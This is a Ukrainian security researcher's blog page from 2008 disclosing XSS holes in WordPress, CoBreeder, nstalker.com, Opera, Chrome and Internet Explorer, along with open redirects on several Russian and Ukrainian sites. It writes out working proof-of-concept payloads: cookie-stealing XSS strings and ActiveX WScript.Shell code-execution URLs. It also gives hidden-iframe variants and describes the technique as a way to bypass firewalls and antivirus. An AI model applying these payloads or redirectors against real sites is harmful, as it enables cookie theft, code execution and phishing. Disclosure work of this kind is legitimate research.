Websecurity - Веб безпека

Нещодавно була виявлена Cross-Site Scripting уразливість в WordPress (обмежено persistent XSS, тому що працює обмежений час після створення). Уразливі WordPress 2.6.3 та попередні версії.

Дірка в RSS Feed Generator в WordPress, що не фільтрує заголовок Host. Атака відбувається через HTTP_HOST на сервері з Apache 2.x, що використовує IP based virtual hosting, на WP з плагіном WP Super Cache. Уразливі версії плагіна WP Super Cache <= 0.84.

• WordPress XSS vulnerability in RSS Feed Generator (деталі)

09.05.2008

У березні, 29.03.2007, я знайшов Cross-Site Scripting уразливість в системі CoBreeder. Це система управління контентом (CMS).

Деталі уразливості з’являться пізніше, спочатку повідомлю розробникам системи.

26.11.2008

XSS:

http://site/%22style=%22xss:expression(alert(document.cookie))%22/*
Варіант для IE (можна також в усіх браузерах через onMouseOver) для сайтів на PHP <= 5.2.4.

http://site/"style="xss:expression(alert(document.cookie))"/*
Варіант для IE для сайтів на будь-яких версіях PHP.

На PHP > 5.2.4 дана уразливість працює лише в IE, коли посилати запит з лапками в ASCII, а не UTF-8 форматі (Mozilla і Firefox завжди конвертують запит в UTF-8). Що показали мої дослідження на декількох сайтах на CoBreeder з різними версіями PHP.

Атака з першим запитом може робити в залежності від версії PHP на веб сервері, другий запит є універсальним. XSS атака відбувається через PHP_SELF.

Уразлива версія coBreeder 2005 та попередні версії.

В даній добірці уразливості в веб додатках:

• Alcatel-Lucent OmniPCX Remote Command Execution (деталі)
• SkyPortal vRC6 Multiple Remote Vulnerabilities (деталі)
• Owning Big Brother: How to Crack into Axis IP cameras (деталі)
• Irola My-Time v3.5 SQL Injection (деталі)
• VigileCMS <= 1.8 Stealth Remote Command Execution Exploit (деталі)
• NetAuctionHelp Classified Ads v1.0 SQL Injection (деталі)
• vBTube v1.1 - Beta ( Vbulletin Tube) Xss Vulnerable (деталі)
• PBLang <= 4.99.17.q Remote File Rewriting / Remote Command Execution (деталі)
• Vulnerability in CoolShot E-Lite POS 1.0 (деталі)
• Bitcomet Resource Browser v1.1 XSS (деталі)

15.05.2008

У жовтні, 19.10.2007, я знайшов численні Cross-Site Scripting уразливості на http://www.nstalker.com - сайті секюріті компанії N-Stalker, розробника N-Stalker Web Application Security Scanner. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

24.11.2008

XSS:

POST запит на сторінці http://www.nstalker.com/about/contact
"><script>alert(document.cookie)</script>В полях: Company, Name, Job Title, E-mail, Phone, City/State.

</textarea><script>alert(document.cookie)</script>В полі: Comments.

XSS через GET:

• alert(document.cookie)
• цікавий

Дані уразливості досі не виправлені.

Продовжую розповідати вам про редиректори на популярних сайтах. Редиректори - це окремий різновид уразливостей в веб додатках, котрий відноситься до класу Abuse of Functionality. Дані уразливості можуть використовуватися зловмисниками для переадресації на небезпечні та фішинг сайти.

До наведених в попередньому записі, приведу ще декілька прикладів редиректорів на популярних веб сайтах.

Редиректори на популярних сайтах:

Yandex.ru (до раніше згаданих редиректорів на Яндексі):

http://fotki.yandex.ru/…&retpath=http://websecurity.com.ua

H.ua:

http://h.ua:8000/openads/…?dest=http://websecurity.com.ua

Techlabs.by:

http://file.techlabs.by/…?download=http://websecurity.com.ua

В даній добірці уразливості в веб додатках:

• Several XSS, Cross-domain Redirection and Frame Injection on Sun Java System Identity Manager (деталі)
• Remote Shell Command Execution in “KB-Bestellsystem” (amensa-soft.de) (деталі)
• MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection (деталі)
• Wheatblog (wB) Remote File inclusion (деталі)
• NetAuctionHelp SQL Injection (деталі)
• alstrasoft E-Friends <= 4.98 (seid) Multiple Remote SQL Injection Vulnerabilities (деталі)
• GetBlog local File inclusion (деталі)
• E-vanced Solutions Multiple Vulnerabilites (деталі)
• GWextranet Multiple Vulnerabilites (деталі)
• Ucms <= 1.8 Backdoor Remote Command Execution Exploit (деталі)

Учора я писав про Code Execution через XSS в Internet Explorer (розроблену мною 14.11.2008) - це була атака лише через IE. А зараз я розповім про міжбраузерний Code Execution через XSS.

Дана атака через IE через Cross-Site Scripting уразливість в Opera.

Атака працює при збереженні веб сторінки в Opera як Web Archive файла з іменем .htm (.html) на комп’ютер користувача і наступному її відкритті в IE. Дана методика може використовуватися для обходу різних проксі й фаєрволів, що аналізують зміст веб сторінок на предмет шкідливого коду (тому що атакуючий код з’являється в сторінці вже після збереження). А також може використовуватися для обходу антивірусів.

Code Execution:

http://site/?--%3E%3Cscript%3Ec=new%20ActiveXObject('WScript.Shell');c.Run('calc.exe');%3C/script%3E

Для проведення прихованої атаки можна використати iframe:

<iframe src="http://site/?--%3E%3Cscript%3Ec=new%20ActiveXObject('WScript.Shell');c.Run('calc.exe');%3C/script%3E" height="0" width="0"></iframe>

На відміну від попередньої атаки (що відбувається лише через IE), дана міжбраузерна атака працює в IE навіть без ввімкненої опції “Initialize and script ActiveX control not marked as safe”.

Уразлива версія Opera 9.52 та попередні версії (і потенційно наступні версії). Запуск коду відбудеться в будь-якій версії Internet Explorer (IE6 та IE7).

Аналогічна атака також може бути проведена в браузері Google Chrome - через Cross-Site Scripting уразливість в Google Chrome. Тільки в Chrome треба зберігати сторінку не як Web Archive, а так само як і в IE, зберігти як Web Page, complete.

Але тільки в старих версіях (Chrome <= 0.2.149.30), бо в версіях починаючи з Chrome 0.3.154.9 дана XSS вже виправлена. Дані XSS уразливості в Opera та Chrome відносяться до типу Saved XSS.

12.05.2008

У жовтні, 18.10.2007, я знайшов Cross-Site Scripting уразливість на проекті http://www.videoradar.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

21.11.2008

XSS:

• alert(document.cookie)

Дана уразливість вже виправлена. Але виправлена неякісно, тому при невеликій зміні коду уразливість знову працює.

XSS:

• alert(document.cookie) (IE)
• цікавий (IE)

В минулому і цьому році я знайшов Cross-Site Scripting уразливості в різних браузерах (IE, Chrome і Opera), що відносяться до типу Saved XSS. Про дані XSS я писав раніше, зокрема в проекті День багів в браузерах 2. І нещодавно, 14.11.2008, я розробив методику проведення Code Execution атаки через дані XSS уразливості.

Зараз розповім про Code Execution атаку через Cross-Site Scripting уразливість в Internet Explorer.

Атака працює при збереженні в IE веб сторінки на комп’ютер користувача і наступному її відкритті в IE. Дана методика може використовуватися для обходу різних проксі й фаєрволів, що аналізують зміст веб сторінок на предмет шкідливого коду (тому що атакуючий код з’являється в сторінці вже після збереження). А також може використовуватися для обходу антивірусів.

Code Execution:

http://site/?--><script>c=new/**/ActiveXObject('WScript.Shell');c.Run('calc.exe');</script>

Символи коментарю “/**/” потрібні, щоб обійти обмеження IE на пробіли, який замінює їх в URL на %20 і не конвертує назад при збереженні сторінки. Зате він робить це при використанні iframe в коді сторінки, тому в цьому випадку коментарі не потрібні.

Для проведення прихованої атаки можна використати iframe:

<iframe src="http://site/?--><script>c=new ActiveXObject('WScript.Shell');c.Run('calc.exe');</script>" height="0" width="0"></iframe>

Дана атака працює в Internet Explorer коли ввімкнена (Enabled чи Prompt) опція “Initialize and script ActiveX control not marked as safe” (для Local intranet). Це такий баг в дірці Microsoft і це метод обходу багу. Дане налаштування потрібне лише при атаці через цю XSS, коли JS код знаходиться на тому ж рядку, де і коментар. Бо коли на іншому рядку (тобто без передуючого коментарю), то код спрацьовує і без цієї опції (Disable). Що може бути досягнуто у випадку, якщо атака проводиться не через XSS, а безпесередньо в тілі сторінки розміщений (відповідним чином) атакуючий код.

Уразлива версія Internet Explorer 6 (6.0.2900.2180) і попередні версії. Та Internet Explorer 7 (7.0.6000.16711) і попередні версії.

В даній добірці уразливості в веб додатках:

• Oracle 11g/10g Installation Vulnerability (деталі)
• Oracle 0-day to get SYSDBA access (деталі)
• IceBB 1.0rc6 <= Remote SQL Injection (деталі)
• IceBB 1.0rc6 <= Remote SQL Injection (деталі)
• VigileCMS 1.4 Multiple Remote Vulnerabilities (деталі)
• FairSoft S.Mini web Busines Prelease & Calendar asp Sql injection (деталі)
• VU Case Manager “Username/Password” SQL Injection (деталі)
• VU Mailer (Mass Mail) “Password” SQL Injection (деталі)
• Updated phpMyAdmin packages fix multiple vulnerabilities (деталі)
• MySpace Scripts - Poll Creator JavaScript Injection Vulnerability (деталі)